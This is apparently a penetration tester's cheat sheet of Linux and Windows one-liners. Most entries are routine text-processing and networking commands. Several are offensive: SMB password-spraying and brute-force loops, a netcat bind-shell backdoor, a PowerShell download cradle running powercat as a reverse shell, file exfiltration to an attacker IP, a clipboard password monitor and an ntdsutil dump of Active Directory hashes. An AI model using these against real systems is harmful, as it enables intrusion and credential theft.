# One-Liners ## Linux

Command	Purpose
Command	Purpose
`GREENIE=haha; export GREENIE`	Create an environment var, then export var to be available to other programs
`PATH=$PATH:/root/haha`	adds a folder to PATH while retaining it
`sort \| uniq -c \| sort -n`	Takes `stdin`, sorts it, finds out the count of each unique value, then sorts by number
`cat squid_access.log \| sort -k 2 \| head`	Using the `sort -k` parameters sorts on the second colmun of the output
`wc -l` [lines] `wc -c` [bytes] `wc -w` [words]	Count lines/bytes/words in a file or from `stdin`
`awk '{print $1,$4}'`	Print characters 1 and 4 (not zero indexed) from `stdin`
`awk '{print $(NF-1)}'`	print the 2nd to last column
`awk '{print length, $1}'`	print the length of each line and the contents
`awk '{ sum += $1 } END { print sum }'`	Takes the lines from a file/`stdin` and adds up the values, quick and dirty calculator in terminal
`cat peptides.txt \| while read line; do echo $line; done`	read in lines from `peptides.txt`, then perform `echo` for each line. Useful to loop through commands for a list of items
`cat users.txt \| while read i; do echo trying $i; smbmap -u '$i' -p '$i' -H 10.10.10.172; done`	Password spraying using a `bash` loop
`for i in {1..5}; do echo $i; done`	Loops from 1 to 5 and echos for each value of `i`
`for i in {000..999}; do echo KEY-HAHA-$i; done`	Creates a list of all values from `KEY-HAHA-000` to `KEY-HAHA-999`
`TF=$(mktemp -d)`	Create a temporary directory (i.e. `/tmp/tmp.gq9gT5U3`) and assign as an environment variable
`${#TF}`	bash will return the amount of characters in the `TF` variable
`sed 's/12/13/g'`	Replace `12` with `13` found anywhere in stdin, will replace `1234` with `1334`
`sed -i.bak '/line to delete/d' *`	Delete a line of text for all files in a directory
`xxd -p`	Print the hex of `stdin` or a file only, no hexdump format
`xxd -r`	Interpret raw hex from `stdin`, can redirect to save the hex to a file
`tr -d '\r' \| tr -d '\n' \| xxd -r -p`	Takes hex input, removes newlines, and places into a file
`find / -user Matt 2>/dev/null`	Find all files owned by `Matt` on the box, redirects `stderr` to null
`find /etc -type f --name apache2.*`	Find any file which begins with `apache2.*` in `/etc`
`grep -E "(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)\.(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)\.(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)\.(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)"`	grep with regex to match any valid IP address (yes it's ugly)
`curl -d "param1=value&param2=value" https://example.com/resource.cgi`	Send parameters with `curl`
`date -d @1286536308`	convert an epoch timestamp to `date` output
`mknod backpipe p; /bin/bash 0<backpipe \| nc -l -p 8080 1>backpipe`	Create netcat backdoor without `-e` support. Generates a named pipe to funnel data
`tar -zcvf files.tar.gz /var/log/apache2`	Creates a `files.tar.gz` archive of all files in `/var/log/apache2`
`prips 10.10.10.0/24`	Prints all IPs in a specific subnet
`ifconfig eth0 169.254.0.1 netmask 255.255.0.0 broadcast 169.254.255.255`	assign an IP from terminal
`ifconfig eth0 down; ifconfig eth0 hw ether 00:11:22:33:44:55; ifconfig eth0 up`	change MAC for interface
`dhclient eth0`	request DHCP address
`dd if=./input.file of=./outfile`	make a bit-by-bit copy of a file or system
`sudo ln -s /usr/bin/python3 /usr/bin/python`	create a symbolic link for python to run python3
`sudo mkdir /mnt/new` `mount /dev/sbd1 /mnt/new` `umount /dev/sdb1`	mount/unmount a filesystem
` `sudo route add -net default gw 10.10.0.1 netmask 0.0.0.0 dev wlan0 metric 1`	Add another default route with a higher metric to choose a different interface to access the Internet
`sudo dhclient wlan0`	Request a new DHCP lease on interface `wlan0`
`openssl enc -aes-256-cbc -salt -in file.txt -out file.txt.enc`	encrypt a file with a password at the commandline
`openssl enc -aes-256-cbc -d -in file.txt.enc -out file.txt`	decrypt a file using a password at the commandline

## Windows | Command | Purpose | | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | --------------------------------------------------------------------------------------------------------------------- | | `get-childitem -hidden` | See all files in current dir | | `gci -recurse C:\ \| % { select-string -path $_ -pattern password} 2>$null` | search through all files in C:\ for the string `password` | | `1..255 \| % {ping -n1 192.168.0.$_ \| sls ttl}` | Counting loop for ping sweep | | `(New-Object System.Net.Webclient).DownloadFile("http://10.1.1.1:8000/nc.exe","C:\nc.exe")` | Downloads a file to the `C:\` location | | `IEX(New-Object System.Net.Webclient).DownloadString('http://10.1.1.1:8000/powercat.ps1');powercat -c 10.1.1.1 -p 8001 -e powershell.exe` | download a ps1 file and execute it in **MEMORY** only | | `certutil -hashfile ntds.dit md5` | Hash a file | | `certutil -encodehex ntds.dit ntds.hex` | Encode a file as hex | |

certutil -encode test.jpg test.base64

certutil -decode test.base64 test.jpg

| Encode and decode a file as base64 | | `@FOR /F %p in (pass.txt) DO @FOR /F %n in (users.txt) DO @net use \\SERVERIP\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\SERVERIP\IPC$ > NUL` | Dirty looping command to gather a list of users and passwords to bruteforce a server on SMB | | `Invoke-RestMethod -Uri http://10.10.14.28:8000/ -Method Post -InFile copy_cert9.db -UseDefaultCredentials` | Sends the file to a server, catch the file on the other end | | `iwr -uri http://10.10.14.27/SharpHound.ps1 -outfile SharpHound.ps1` | Download a file from another machine | | `$x=""; while ($true) { $y=get-clipboard -raw; if ($x -ne $y) { write-host $y; $x=$y } }` | Powershell - monitors the clipboard and prints to the screen as items are placed on it (passwords!!) | |

ntdsutil

activate instance ntds

ifm

create full C:\ntds

quit

| Use built-in `ntdsutil` tool to obtain the `SYSTEM` registry and hive data as a backup, contains user hashes to crack |